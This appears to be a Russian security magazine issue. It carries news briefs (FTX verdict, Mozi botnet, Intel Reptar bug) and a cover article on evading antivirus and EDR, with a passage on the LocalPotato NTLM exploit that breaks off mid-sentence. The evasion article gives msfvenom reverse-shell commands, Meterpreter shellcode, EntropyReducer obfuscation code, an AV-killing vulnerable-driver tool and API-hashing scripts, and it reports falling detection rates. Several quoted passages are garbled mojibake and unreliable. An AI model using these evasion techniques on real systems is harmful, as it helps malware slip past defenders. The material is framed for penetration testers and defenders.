Федеральный суд с участием присяжных заседателей признал основателя и бывшего главу криптовалютной биржи FTX и фонда Alameda Research Сэма Бэнкмана-Фрида виновным по семи пунктам обвинения. Максимальный срок лишения свободы по этим обвинениям составляет 110 лет. Напоминаем, что мы посвятили краху FTX и скандалу, связанному с ее банкротством, большую статью. Судебный процесс проходил в окружном суде США по Южному округу Нью-Йорка, расположенном на Манхэттене. В обвинительном заключении сказано, что Сэм Бэнкман-Фрид «присвоил и растратил средства клиентов FTX и использовал миллиарды долларов похищенных средств... для собственного обогащения; поддержания деятельности FTX; финансирования спекулятивных венчурных инвестиций; сделал более ста миллионов долларов взносов в избирательные кампании демократов и республиканцев с целью повлиять на криптовалютное регулирование; а также для оплаты операционных расходов Alameda». Также его обвинили в том, что он делал «ложные и мошеннические заявления и утверждения для инвесторов FTX и кредиторов Alameda». В список из семи обвинений входят: • мошенничество с использованием электронных средств связи; • сговор с целью совершения мошенничества с использованием электронных средств связи против клиентов FTX; • мошенничество с использованием электронных средств связи по отношению к кредиторам Alameda Research; • сговор с целью совершения мошенничества с использованием электронных средств связи в отношении кредиторов Alameda Research; • сговор с целью совершения мошенничества с ценными бумагами инвесторов FTX; • сговор с целью совершения мошенничества с ценными бумагами клиентов FTX в связи с покупкой и продажей криптовалюты и свопов; • сговор с целью отмывания денег. Пять обвинений, связанных с мошенничеством с использованием электронных средств связи и отмыванием денег, предусматривают максимальное наказание в виде двадцати лет лишения свободы за каждое, а оставшиеся два обвинения — в виде пяти лет лишения свободы за каждое. Присяжные вынесли вердикт после примерно четырех часов обсуждения. Фактический приговор бывшему главе FTX будет вынесен и оглашен 28 марта 2024 года. На этом процессе Сэм Бэнкман-Фрид, который так и не признал себя виновным, решил дать показания в свою защиту и попытался переложить вину за случившееся на других. Сообщается, что на вопросы обвинения он больше ста раз отвечал «я не уверен» или «я не помню», избегая прямых ответов. Также он заявил, что допустил ошибки, управляя FTX (например, не сформировал команду по управлению рисками), но не похищал средства клиентов. Бэнкман-Фрид подчеркивал, что, по его собственному мнению, заимствования, которые Alameda делала у FTX, были разрешены, и он не осознавал, насколько велики долги, пока дело не дошло до краха обеих компаний. Три экс-руководителя FTX и дочерней Alameda Research (Гэри Ван, Нишад Сингх и бывшая девушка Бэнкмана-Фрида Кэролайн Эллисон) признали свою вину и дали показания против бывшего руководителя. В своих показаниях они заявили, что Бэнкман-Фрид направлял их на совершение преступлений, в том числе помогал Alameda разграблять FTX, а также лгал кредиторам и инвесторам о настоящем положении дел в компаниях. В ноябре были представлены заключительные аргументы сторон, и судебный процесс, длившийся около месяца, подошел к концу. В суде прокурор США Николас Роос заявлял, что нет никаких серьезных сомнений в том, что 10 миллиардов долларов средств, принадлежащих клиентам FTX, пропали, и что теперь присяжные должны решить, знал ли Бэнкман-Фрид о том, что его действия были неправомерными.

«

«Ýòî áûëà öåëàÿ ïèðàìèäà îáìàíà, ïîñòðîåííàÿ ïîäñóäèìûì íà ôóíäàìåíòå èç ëæè è ëîæíûõ îáåùàíèé, è âñå ýòî äëÿ òîãî, ÷òîáû ïîëó÷èòü äåíüãè, — ñêàçàë Ðîîñ. —  èòîãå îíà ðóõíóëà, îñòàâèâ ïîñëå ñåáÿ òûñÿ÷è æåðòâ».

»

Защитник экс-главы FTX Марк Коэн настаивал на том, что Бэнкман-Фрид допускал ошибки, но не совершал преступлений:

«

«Áèçíåñ ðåøåíèÿ, ïðèíÿòûå èç ëó÷øèõ ïîáóæäåíèé, íå ÿâëÿþòñÿ îñíîâàíèåì äëÿ îñóæäåíèÿ, — çàÿâëÿë Êîýí. — Ïëîõîå óïðàâëåíèå ðèñêàìè — ýòî íå ïðåñòóïëåíèå. Ïëîõèå áèçíåñ ðåøåíèÿ — íå ïðåñòóïëåíèå».

»

Сторона обвинения сравнивала эту аргументацию с тем, «как если бы кто-то ограбил ювелирный магазин и оправдывал свои действия тем, что там не было охранника». «Обвиняемый знал, что поступает неправильно, и именно поэтому не стал нанимать специалистов по управлению рисками», — настаивал прокурор Даниэль Сассун. Хотя завершившийся судебный процесс охватывал семь уголовных обвинений, в общей сложности Бэнкману-Фриду были предъявлены обвинения по двенадцати пунктам. Отдельное судебное разбирательство, запланированное на март 2024 года, будет посвящено оставшимся обвинениям, а именно мошенничеству против клиентов FTX в связи с покупкой и продажей деривативов, мошенничеству с ценными бумагами клиентов FTX, сговору с целью совершения банковского мошенничества, сговору с целью ведения нелицензированного бизнеса по переводу денег, а также сговору с целью нарушения антикоррупционных положений Закона о противодействии коррупции за рубежом. После оглашения вердикта присяжных адвокат Марк Коэн заявил, что «разочарован», но уважает их решение.

«

«Ìèñòåð Áýíêìàí Ôðèä íàñòàèâàåò íà ñâîåé íåâèíîâíîñòè è áóäåò ïðîäîëæàòü àêòèâíî áîðîòüñÿ ñ âûäâèíóòûìè ïðîòèâ íåãî îáâèíåíèÿìè», — ñîîáùèë ïðåññå Êîýí.

»

Стоит отметить, что с августа 2023 года Бэнкман-Фрид находится в тюрьме, куда попал после того, как судья отменил его залог и домашний арест, придя к выводу, что бывший глава FTX, вероятно, пытался манипулировать свидетелями.

АУДИТОРИЯ TELEGRAM В РОССИИ ВЫРОСЛА ДО 82,3 ÌÈËËÈÎÍÀ ЧЕЛОВЕК Исследовательская компания Mediascope подсчитала, что аудитория Instagram (принадлежит корпорации Meta, деятельность которой признана экстремистской и запрещена в РФ) после блокировки продолжает падать. По итогам октября 2023 года месячный охват платформы в России составил всего 25,1  миллиона человек — в 2,5  раза меньше, чем в октябре 2021 года. При этом аудитория Facebook, также принадлежащей Meta, еще в 2022 году сократилась в 2,3  раза, с 41,3  миллиона до 18  миллионов человек, но с тех пор этот показатель не менялся.

Главным бенефициаром происходящего стал Telegram: по итогам октября 2023 года охват этой платформы составил 82,3 миллиона человек, что на 15% больше, чем в октябре 2022 года, и на 62% больше, чем в октябре 2021 года. Отмечается, что при этом рост других российских соцсетей («Вконтакте» и «Одноклассников») заметно замедлился.

БОТНЕТ MOZI ОТКЛЮЧИЛСЯ

Специалисты строят теории о загадочном отключении ботнета Mozi, который недавно был ликвидирован с помощью специального «рубильника», предназначенного для деактивации всех ботов. Mozi — известный DDoS-ботнет, появившийся еще в 2019 году и нацеленный в первую очередь на IoT-устройства, такие как маршрутизаторы, DVR и другие гаджеты, подключенные к интернету. Эта малварь использовала известные уязвимости и слабые пароли для компрометации устройств и включения их в свою P2P-сеть, где они взаимодействовали с помощью протокола BitTorrent DHT. В июне 2021 года китайская ИБ-компания Qihoo 360 сообщала, что Mozi насчитывает около 1,5 миллиона зараженных устройств, более 800 тысяч находятся в Китае. Спустя несколько недель после этого компания рассказала, что помогала правоохранительным органам в аресте предполагаемых разработчиков Mozi, отметив при этом, что сам ботнет, скорее всего, сохранит жизнеспособность и продолжит работу. Как сообщили теперь специалисты компании ESET, резкое падение активности Mozi началось еще 8 августа 2023 года с остановки всех операций ботнета в Индии. За этим 16 августа 2023 года последовало аналогичное внезапное прекращение деятельности в Китае, на родине ботнета.

Затем 27 сентября 2023 года всем ботам Mozi восемь раз было отправлено одинаковое UDP-сообщение с указанием загрузить обновление через HTTP, которое привело к следующему: • ликвидация вредоносного процесса Mozi; • отключение некоторых системных служб (sshd и dropbear); • замена файла Mozi; • выполнение команд конфигурации на устройстве; • блокировка доступа к различным портам; • создание плацдарма для нового файла. Исследователи считают, что это была контролируемая ликвидация, так как человек, активировавший этот «рубильник», решил подготовить зараженные системы для новой полезной нагрузки, которая может пинговать удаленный сервер. Анализ кода, проведенный исследователями, показал значительное сходство между оригинальным кодом Mozi и бинарными файлами, использованными при уничтожении ботнета, в которых были указаны корректные приватные ключи для подписи пейлоада. По мнению специалистов, это намекает на причастность к уничтожению ботнета его создателей или китайских правоохранительных органов.

«

«Óíè÷òîæåíèå îäíîãî èç ñàìûõ ìîùíûõ IoT-áîòíåòîâ ïðåäñòàâëÿåò ñîáîé èíòåðåñíûé ñ òî÷êè çðåíèÿ êèáåðêðèìèíàëèñòèêè ñëó÷àé, äàþùèé íàì èíòðèãóþùóþ òåõíè÷åñêóþ èíôîðìàöèþ î òîì, êàê ñîçäàþòñÿ, ðàáîòàþò è ëèêâèäèðóþòñÿ ïîäîáíûå áîòíåòû», — ïèøóò àíàëèòèêè ESET.

»

ТЕЛЕКОМЫ СТАНОВЯТСЯ ЖЕРТВАМИ DDOS Аналитики группы компаний «Гарда» провели исследование изменений ландшафта и особенностей DDoS-атак в третьем квартале 2023 года. Доля флуда TCP SYN значительно выросла, достигнув 60%. На втором месте (20%) расположился флуд TCP ACK, а UDP-флуд занимает третье место с 13%. Доля атак типа DNS Amplication составила всего 3%, показав снижение по сравнению со вторым кварталом, а доля NTP Amplication и вовсе упала с 9 до 1%.

Наибольший объем атак был зарегистрирован на сетях телеком операторов. Это объясняется тем, что операторы интенсивно борются с DDoS-атаками, защищая как собственные объекты, так и ресурсы своих клиентов, размещенные в той же инфраструктуре. На втором месте оказалась сфера сектора.

транспорта и перевозок. На третьем — ресурсы гос-

Также исследователи отметили неожиданно большое количество атак на топливно энергетический комплекс и промышленность. По их мнению, это может говорить о попытках хакеров воздействовать на сектор реальной экономики.

БАГ REPTAR УГРОЖАЕТ ЧИПАМ INTEL

Компания Intel устранила серьезную уязвимость в процессорах для десктопов, серверов, мобильных устройств и встраиваемых систем, включая новейшие микроархитектуры Alder Lake, Raptor Lake и Sapphire Rapids. Проблема может использоваться для повышения привилегий, получения доступа к конфиденциальной информации и провоцирования отказа в обслуживании. Уязвимость, обнаруженная самими инженерами Intel, получила идентификатор CVE-2023-23583 и описывается как «проблема избыточного префикса». Изначально считалось, что эта ошибка может использоваться только для провоцирования отказа в обслуживании (уязвимость получила только 5,5 балла по шкале CVSS), и Intel планировала выпустить патч для нее в марте 2024 года. Однако более глубокий анализ показал, что существует способ использовать баг для повышения привилегий, поэтому Intel перенесла дату выхода патча на ноябрь 2023 года. В итоге оценка уязвимости изменилась и теперь составляет 8,8 балла по шкале CVSS.

«

«Ïðè îïðåäåëåííûõ îáñòîÿòåëüñòâàõ íà ìèêðîàðõèòåêòóðàõ Intel âûÿâëåíû ñëó÷àè, êîãäà âûïîëíåíèå èíñòðóêöèè (REP MOVSB), çàêîäèðîâàííîé ñ èçáûòî÷íûì ïðåôèêñîì REX, ìîæåò ïðèâîäèòü ê íåïðåäñêàçóåìîìó ïîâåäåíèþ ñèñòåìû, âûçûâàþùåìó êðèòè÷åñêèé ñáîé èëè çàâèñàíèå, à â íåêîòîðûõ ñöåíàðèÿõ — ê ïîâûøåíèþ ïðèâèëåãèé ñ CPL3 äî CPL0, — ñîîáùàþò èíæåíåðû Intel. — Intel íå ðàññ÷èòûâàåò, ÷òî êàêîå ëèáî íåâðåäîíîñíîå ïðîãðàììíîå îáåñïå÷åíèå ñòîëêíåòñÿ ñ ýòîé ïðîáëåìîé â ðåàëüíûõ óñëîâèÿõ. Îæèäàåòñÿ, ÷òî èçáûòî÷íûå ïðåôèêñû REX íå áóäóò ïðèñóòñòâîâàòü â êîäå è ãåíåðèðîâàòüñÿ êîìïèëÿòîðàìè. Âðåäîíîñíàÿ ýêñïëóàòàöèÿ ýòîé ïðîáëåìû òðåáóåò âûïîëíåíèÿ ïðîèçâîëüíîãî êîäà. Òàêæå â ðàìêàõ âíóòðåííåé ïðîâåðêè, ïðîâåäåííîé â êîíòðîëèðóåìîé ëàáîðàòîðíîé ñðåäå, Intel âûÿâèëà âîçìîæíîñòü ïîâûøåíèÿ ïðèâèëåãèé â îïðåäåëåííûõ ñöåíàðèÿõ».

»

Системы с уязвимыми процессорами, в том числе с Alder Lake, Raptor Lake и Sapphire Rapids, уже получили обновленные микрокоды, причем эти патчи не оказывают влияния на производительность. Также компания выпустила обновления микрокода для других процессоров. Пользователям рекомендуется обновить BIOS, ОС и драйверы, чтобы получить патчи от OEM-производителей, поставщиков ОС и поставщиков гипервизоров. Полный список процессоров, затронутых уязвимостью CVE-2023-23583, а также рекомендации по ее устранению доступны на сайте Intel. Эксперт Google Тэвис Орманди (Tavis Ormandy) сообщил, что ту же уязвимость самостоятельно обнаружили несколько исследовательских групп Google, включая Google Information Security Engineering и команду silifuzz, которые дали проблеме имя Reptar. Как пояснил вице-президент и CISO Google Cloud Фил Венаблс (Phil Venables), баг связан с тем, «как избыточные префиксы интерпретируются процессором, что в случае успешной эксплуатации приводит к обходу защитных границ». По данным специалистов Google, злоумышленник в многопользовательской виртуальной среде может использовать эту уязвимость для атаки на гостевую машину, что приведет к отключению хоста и отказу в обслуживании для других гостей на этом хосте. Также, как уже отмечалось выше, проблема может помочь раскрыть информацию и повысить привилегии.

Критический баг в Atlassian Conuence приводит к потере данных Обнаружен подпольный сервис для сокращения URL Для борьбы с распространением малвари Discord будет использовать временные ссылки LockBit взломала Boeing и сливает похищенные данные Алгоритмы стандарта транкинговой связи TETRA станут доступны широкой публике Атака CacheWarp позволяет обойти защиту AMD SEV и получить root-доступ Исследователи извлекают ключи RSA из SSH-трафика Криптовалютные кошельки 2011–2015 годов уязвимы перед проблемой Randstorm Разработчики Lumma заявили, что могут восстановить устаревшие cookie Google Пароли администраторов раскрыты из-за критического бага в ownCloud

COVERSTORY

Антивирусы и системы EDR становятся всё навороченнее и даже используют машинное обучение для более точного детектирования. Но у авторов малвари по-прежнему остаются способы обойти все проверки. В этой статье я покажу несколько техник и инструментов, которые применяют злоумышленники.

Кристина Гук Специалист по тестированию на проникновение в RTM Group [email protected]

Материал призван помочь практикующим специалистам по пентесту и SoCаналитикам разобраться с тем, как злоумышленники могут проникать в системы, минуя EDR (endpoint detection & response).

Статья имеет ознакомительный характер и предназначена для специалистов по безопасности, проводящих тестирование в рамках контракта. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.

ÍÀ ×ÅÌ ÌÛ ÒÅÑÒÈÐÎÂÀËÈ Для исследований мы использовали Kaspersky Endpoint Detection and Response и его вариацию для Linux (KESL), опенсорсный ClamAV, McAffee, Microsoft Defender Advanced Threat Protection, а также VirusTotal. Конечная цель — получить обратное соединение на наш C2-сервер, роль которого будет исполнять Metasploit Framework, один из самых популярных пентестерских инструментов. За последние годы АV и EDR научились уже на ранних стадиях обнаруживать файлы, которые были сгенерированы Metasploit, потому что существует множество сигнатур для выявления установки bind- и reverse-шеллов. EDR определяют, какие файлы .dll и .so используются при старте оболочки Meterpreter, и это лишь малая часть признаков, помогающих выявить вредоносный процесс. Для чистоты эксперимента мы возьмем шелл-код, сгенерированный через msfvenom, и будем пытаться его модернизировать. Но для начала посмотрим, сколько сейчас дает баллов VirusTotal на дефолтный exe-стейджер, сгенерированный следующей командой: msfvenom -p windows/meterpreter/reverse_tcp LHOST=eth0 LPORT=444 -f exe -o ab.exe

Результаты проверки на VirusTotal То есть стандартный стейджер без проблем обнаруживается современными защитными решениями. Давай попробуем сделать вариант с обходом. Будем генерировать шелл-код на С, так как это идеальный выбор, если нам нужна скорость и кросс-платформенность. Вот как выглядит наш первоначальный шелл-код:

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=eth0 LPORT=444-f c [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 354 bytes Final size of c file: 1518 bytes unsigned char buf[] = "\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x64\x8b\x52\x30\x89" "\xe5\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" ... "\x5e\xff\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff" "\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a" "\x00\x53\xff\xd5";

Ничего необычного. Шелл-код просто дает реверс-шелл, а обмен данных происходит по TCP. Мы даже не применяли шифрование и кодирование.

В последние годы большинство вендоров AV/EDR внедрили поведенческий анализ с использованием машинного обучения, что позволяет более точно анализировать поведение программы и классифицировать ее как вредоносную. Для этого проводится постоянный мониторинг процесса: EDR сравнивает действия с профилями поведения. Это повышает шансы обнаружения, но нагружает систему, может приводить к ложным срабатываниям и конфликтам с другим ПО. И конечно, по-прежнему актуальны старые методы: • эвристический анализ; • сигнатурный анализ • сендбоксинг; • IAT checking (проверка используемых функций и библиотек. Например, если в IAT есть функции шифрования, то EDR может решить, что перед ним шифровальщик); • API hooking (перехват вызовов функций и перенаправление потока кода). В общем, чем дальше, тем больше всяких проверок.

На сетевом уровне существует несколько методов, которые можно использовать, чтобы попытаться избежать обнаружения: DNS-туннелирование, самоподписанные сертификаты HTTPS, протокол ICMP. Однако современные системы обнаружения угроз не поддаются на все эти уловки.

ÔÐÅÉÌÂÎÐÊÈ ÄËß ÎÁÕÎÄÀ AV/EDR NimBlackout NimBlackout позволяет удалить AV/EDR при помощи уязвимого драйвера. Драйвер GMER используется для взаимодействия с ядром операционной системы и дает возможность обнаруживать и анализировать скрытые вредоносные элементы. Программа написана на Nim, давай скомпилируем ее на Linux: nim --os:windows --cpu:amd64 --gcc.exe:x86_64-w64-mingw32-gcc --gcc. linkerexe:x86_64-w64-mingw32-gcc c NimBlackout.nim

На выходе получили PE, в который нужно передать процесс с антивирусом. Далее надо установить уязвимый драйвер в ОС и запустить наш исполняемый файл.

Установка драйвера и запуск .exe Эта атака нацелена на Microsoft Defender. Однако тут есть одно но: версия GMER из этого PoC может не сработать на Windows 11 и последних версиях Windows 10. Более того, для запуска нам нужно иметь привилегии локального администратора. EntropyReducer Как ты, возможно, знаешь, энтропия — это степень случайности в заданном наборе данных. Существуют разные способы измерять энтропию, в нашем контексте под этим термином мы будем подразумевать энтропию Шеннона, которая дает значение от 0 до 8. С увеличением уровня случайности в наборе данных увеличивается и значение энтропии. Двоичные файлы вредоносного ПО зачастую имеют более высокую энтропию, чем обычные файлы. Высокая энтропия — явный показатель сжатых, зашифрованных или упакованных данных, которые используются вредоносными программами для скрытия сигнатур. Для примера посчитаем энтропию от обычного meterpreter/reverse_tcp. Сначала сгенерируем файл: msfvenom -p windows/meterpreter/reverse_tcp LHOST = eth0 LPORT = 4444 -f raw -o entropy.bin

Для подсчета энтропии мы будем использовать PeStudio.

Подсчет энтропии файла entropy.bin Результат неутешительный — 6,265, и, как мы видим, PeStudio сразу может предоставить информацию о том, какие антивирусы классифицировали .bin как вредоносный файл. Если число близится к 8, значит, с огромной вероятностью файл вредоносный. Это отмечено в гистограмме ниже.

Гистограмма энтропии файлов Как нам снизить это значение? Тут поможет инструмент EntropyReducer. EntropyReducer сначала проверяет, кратен ли размер полезной нагрузки BUFF_SIZE (эта переменная указывает на количество байтов в полезной нагрузке, после которых будут добавлены пустые байты, NULL_BYTES). Если нет, он увеличивает его до необходимого значения. // This will represent the seraizlized size of one node #define SERIALIZED_SIZE (BUFF_SIZE + NULL_BYTES + sizeof(INT) // Serialized payload size: SERIALIZED_SIZE * (number of nodes) // Number of nodes: (padded payload size) / BUFF_SIZE

Затем он берет каждый блок BUFF_SIZE из полезной нагрузки и создает для него узел связного списка с помощью функции InitializePayloadList. BOOL InitializePayloadList(IN PBYTE pPayload, IN OUT PSIZE_T sPayloadSize, OUT PLINKED_LIST* ppLinkedList); PLINKED_LIST InsertAtTheEnd(IN OUT PLINKED_LIST LinkedList, IN PBYTE pBuffer, IN INT ID); VOID MergeSort(PLINKED_LIST* top, enum SORT_TYPE eType)

У созданного узла пустой буфер размером NULL_BYTES. Этот буфер будет применяться для снижения энтропии. Затем EntropyReducer продолжает случайным образом менять порядок каждого узла в связном списке, нарушая порядок исходной полезной нагрузки. Этот шаг выполняется с помощью алгоритма сортировки слиянием, который реализован в функции MergeSort. case SORT_BY_BUFFER: { iValue1 = (int)(top1->pBuffer[0] ^ top1->pBuffer[1] ^ top1->pBuffer [2]); // calculating a value from the payload buffer chunk iValue2 = (int)(top2->pBuffer[0] ^ top2->pBuffer[1] ^ top2->pBuffer [2]); // calculating a value from the payload buffer chunk break; }

Отсортированный связный список хранится в случайном порядке, потому что значение, по которому он сортируется, — это значение XOR первых трех байтов исходной полезной нагрузки. Именно оно определяет позицию в реорганизованном связном списке. BOOL Obfuscate(IN PBYTE PayloadBuffer, IN SIZE_T PayloadSize, OUT PBYTE* ObfuscatedBuffer, OUT PSIZE_T ObfuscatedSize) { PLINKED_LIST pLinkedList = NULL; *ObfuscatedSize = PayloadSize; // Convert the payload to a linked list if (!InitializePayloadList(PayloadBuffer, ObfuscatedSize, & pLinkedList)) return 0; // ObfuscatedSize now is the size of the serialized linked list // pLinkedList is the head of the linked list // Randomize the linked list (sorted by the value of 'Buffer[0] ^ Buffer[1] ^ Buffer[3]') MergeSort(&pLinkedList, SORT_BY_BUFFER); // printf("---------------------------\n\n"); // PrintList(pLinkedList); // printf("---------------------------\n\n"); PLINKED_LIST pTmpHead = pLinkedList; SIZE_T BufferSize = NULL; PBYTE BufferBytes = (PBYTE)LocalAlloc(LPTR, SERIALIZED_SIZE); // Serailize the linked list while (pTmpHead != NULL) { // This buffer will keep data of each node BYTE TmpBuffer [SERIALIZED_SIZE] = { 0 }; // Copying the payload buffer memcpy(TmpBuffer, pTmpHead->pBuffer, BUFF_SIZE); // No need to copy the 'Null' element, cz its NULL already // Copying the ID value memcpy((TmpBuffer + BUFF_SIZE + NULL_BYTES), &pTmpHead->ID, sizeof( int)); // Reallocating and moving 'TmpBuffer' to the final buffer BufferSize += SERIALIZED_SIZE; if (BufferBytes != NULL) { BufferBytes = (PBYTE)LocalReAlloc(BufferBytes, BufferSize, LMEM_MOVEABLE | LMEM_ZEROINIT); memcpy((PVOID)(BufferBytes + (BufferSize - SERIALIZED_SIZE)), TmpBuffer, SERIALIZED_SIZE); } // Next node pTmpHead = pTmpHead->Next; } // 'BufferBytes' is the serailized buffer *ObfuscatedBuffer = BufferBytes; if (*ObfuscatedBuffer != NULL && *ObfuscatedSize > PayloadSize) return 1; else return 0; }

Поскольку сохранение списка в файле невозможно из-за того, что он уже связан указателями, приходится делать сериализацию с помощью функции Obfuscate. После этого выполняется запись в output_file. Вот что выдает VirusTotal при анализе.

Результаты проверки на VirusTotal Теперь модифицируем файл через EntropyReducer.

Запуск EntropyReducer

Продолжение статьи

→

← НАЧАЛО СТАТЬИ

COVERSTORY

ИЗУЧАЕМ ИНСТРУМЕНТЫ ОБХОДА АНТИВИРУСОВ И EDR

Теперь обнаружение значительно ниже.

Подсчет энтропии файла

Результаты проверки на VirusTotal Вот так выглядит измененный шелл-код с уменьшенной энтропией: unsignedcharentropy_bin_ER[] = { 0x68, 0xc0, 0xa8, 0x8d, 0x00, 0x2f, 0x00, 0x00, 0x29, 0x00, 0x2b, 0x00, 0x00, 0x00, 0x04, 0x3d, ... 0x00, 0x00, 0x00, 0x8b, 0x58, 0x24, 0x01, 0x00, 0xbb, 0xf0, 0xb5, 0xa2, 0x00, 0x56, 0x00, unsigned int entropy_bin_ER_len = 801;

0x00, 0x00, 0x01, 0x00, 0x56, 0x57, 0x68, 0x00,

0x00, 0x1b, 0x00, 0x00, 0x00, 0x00};

Этот код мы можем скомпилировать в .exe. После чего уже не составит труда запустить его, как обычный исполняемый файл. ÏÐÈÌÅÍßÅÌ API HASHING API Hashing — это техника, которую разработчики вредоносного ПО применяют, чтобы скрыть подозрительные вызовы Windows API от таблицы импорта адресов портативного исполняемого файла (PE). Это затрудняет анализ, поскольку становится сложнее определить, какие функции вызываются. Êàê ýòî ðàáîòàåò? Проблема для разработчиков вредоносного ПО: если есть PE с неповрежденной IAT (Import Address Table), легко понять, каковы возможности PE. Например, если видно, что двоичный файл загружает Ws2_32.dll, можно предположить, что он имеет сетевые возможности. Чтобы усложнить первоначальный анализ PE, вирусописатели скрывают подозрительные вызовы API от IAT с помощью API-хеширования. Таким образом, когда аналитик запустит вредоносный двоичный файл через утилиту strings или откроет его в PE-парсере, подозрительные Windows API будут скрыты. Ïðèìåð îáõîäà Предположим, у нас есть вредоносное ПО, которое использует функцию CreateThread. Если мы скомпилируем код и проанализируем его с помощью PE-парсера, увидим, что CreateThread — одна из импортированных функций. Однако если мы применим технику API Hashing, то CreateThread исчезнет из IAT. Для этого разработчики вредоносного ПО могут использовать следующий подход: 1. Создается хеш-функция, которая принимает имя функции (например, CreateThread) и возвращает уникальное хеш-значение. 2. Вредоносное ПО во время выполнения перебирает все экспортированные функции из библиотеки (например, kernel32.dll), вычисляет их хеши и сравнивает с хешем CreateThread. 3. Как только хеш совпадает, вредоносное ПО получает адрес функции и может вызвать ее напрямую, минуя IAT. Рассмотрим подробнее. Как мы должны получить хеш от вызова API? У нас есть пример алгоритма хеширования, который может преобразовать любую функцию в хеш: $APIsToHash = @("VirtualAlloc") $APIsToHash | % { $api = $_ $hash = 0x35 [int]$i = 0 $api.ToCharArray() | % { $l = $_ $c = [int64]$l $c = '0x{0:x}' -f $c $hash += $hash * 0xab10f29f + $c -band 0xffffff $hashHex = '0x{0:x}' -f $hash $i++ write-host "Iteration $i : $l : $c : $hashHex" } write-host "$api`t $('0x00{0:x}' -f $hash)" }

За основу для хеширования мы взяли функцию VirtualAlloc. Она позволяет зарезервировать определенный объем памяти.

Преобразование функции в хеш Проблема только в том, что шелл Meterpreter делает вызов ко множеству API, включая ExitProcess, LoadLibraryA, VirtualAlloc и VirtualFree. И это далеко не полный список. Что же нам делать? Здесь помогает Randomise-apihashes-cobalt-strike. Этот скрипт вычисляет хеши для огромного множества API и заменяет их названия в шелл-коде. Давай установим его на Kali Linux и посмотрим, как он работает. Клонируем репозиторий.

Клонирование репозитория Генерируем шелл-код в сыром виде и записываем в файл с расширением .bin.

Инструмент принимает на вход только .bin!

Генерация шелл-кода И наконец, напустим инструмент на le.bin.

Запуск инструмента Randomise-api-hashes-cobalt-strike Заметил цифру 64 после названия скрипта? Это мы прописываем архитектуру. Разная разрядность — разные вызовы API. После отработки мы получаем файл file.bin_0xf9.bin. Если понадобится получить шелл-код в сыром виде (С-code), то вновь используем xxd.

Получение шелл-кода в С-code А что по обнаружениям? VirusTotal дал 11 из 69.

Результаты проверки на VirusTotal И решения из списка исследуемых не дали отрицательный результат.

Результаты обнаружения Этот шелл-код уже можно скомпилировать в .exe.

Шелл-код для компиляции

Подробнее о технике API Hashing читай в статье «Веселые хеши. Реализуем технику API Hashing, чтобы обдурить антивирус».

ÂÛÂÎÄÛ Хотя на сегодняшний день AV/EDR-решения используют для выявления аномальных действий самые передовые технологии, включая машинное обучение, поведенческую аналитику и прочее, они пока не стали панацеей от киберугроз. Мы рассмотрели несколько методов, некоторые из них пока актуальны и позволяют обойти антивирусные решения. Все это важно учитывать сотрудникам компаний, отвечающих за защиту ресурсов и предотвращение реализации киберугроз.

COVERSTORY

В этой статье речь пойдет об уязвимости, позволяющей выполнить локальное повышение привилегий (LPE) в операционных системах семейства Windows. Баг напрямую связан с NTLM-аутентификацией, поэтому сначала поговорим о том, как она устроена, а потом перейдем непосредственно к разбору CVE-2023-21746.

trazzz0rd Пентестер Лаборатории инновационных технологий и кибербезопасности AP Security

NTLM-ÀÓÒÅÍÒÈÔÈÊÀÖÈß

Предположим, пользователь хочет получить доступ к файловому ресурсу на другом компьютере или сервере. Аутентификация выполняется в четыре этапа: 1. Пользователь отправляет серверу запрос с именем учетной записи. 2. В ответ сервер отправляет ему случайное число, называемое challenge. 3. Пользователь шифрует это число своим NT-хешем и отправляет обратно. 4. Сервер извлекает из SAM (Security Account Manager — RPC-сервер Windows, оперирующий базой данных учетных записей) хеш пользователя и проделывает те же самые действия, что и пользователь, сравнивая полученные хеши. Если результаты совпали, то аутентификация считается успешной. ËÎÊÀËÜÍÀß ÀÓÒÅÍÒÈÔÈÊÀÖÈß NTLM Рассмотрим локальную аутентификацию NTLM, которая начинается с аутентификации пользователя на самой машине.

Эта аутентификация выполняется следующим образом: 1. Пользователь вводит свои учетные данные, логин и пароль, при входе на машину. 2. Введенные данные передаются подсистеме локальной безопасности LSA, которая преобразует пароль в хеш. 3. Далее LSA передает имя пользователя SAM, который извлекает хеш указанного пользователя. 4. LSA сверяет хеши, и если они совпадают, то пользователь получает доступ к машине. Далее срабатывает рассмотренный выше механизм, основанный на модели клиент — сервер. Локальная аутентификация NTLM — это частный случай, она применяется, когда клиентская и серверная части работают на одной машине. Клиент получает учетные данные вошедшего в систему пользователя и создает запрос, содержащий имя рабочей станции и домена клиента.

Сообщение типа 1. Клиент посылает это сообщение для начала соединения. Оно используется для согласования параметров аутентификации, как и раньше, но также содержит имя клиентской машины и ее домен. Сервер может проверить имя и домен клиента, и, если они совпадают с его собственными, начинается процесс локальной аутентификации. Сообщение типа 2. Сервер создает контекст безопасности, вызывая функцию AcceptSecurityContext (NTLM), и в этом сообщении отправляет клиенту его идентификатор. Затем клиент может использовать идентификатор контекста безопасности, чтобы связать себя с соединением. Сообщение 3-го типа. Клиент получает токен и передает его в InitializeSecurityContext (NTLM). Если InitializeSecurityContext (NTLM) возвращает SEC_E_OK, то взаимная аутентификация завершена и можно начинать защищенный сеанс. Если же он возвращает код ошибки, то переговоры о взаимной аутентификации завершаются. В противном случае токен безопасности, возвращенный InitializeSecurityContext (NTLM), отправляется клиенту и шаги 2 и 3 повторяются. ÊÀÊ ÐÀÁÎÒÀÅÒ LOCALPOTATO LocalPotato использует недостаток в механизме локальной аутентификации NTLM. Эксплоит обманывает привилегированный процесс и заставляет аутентифицировать сеанс, запущенный хакером. В результате атакующий получает соединение, предоставляющее ему доступ к любым ресурсам с привилегиями обманутого процесса. «Картошка» работает следующим образом: 1. Хакер запускает привилегированный процесс для подключения к подконтрольному ему серверу. В принципе, это работает аналогично предыдущим Potato, когда непривилегированный пользователь заставлял ОС создавать соединения, использующие права SYSTEM. 2. Сервер на машине создаст контекст 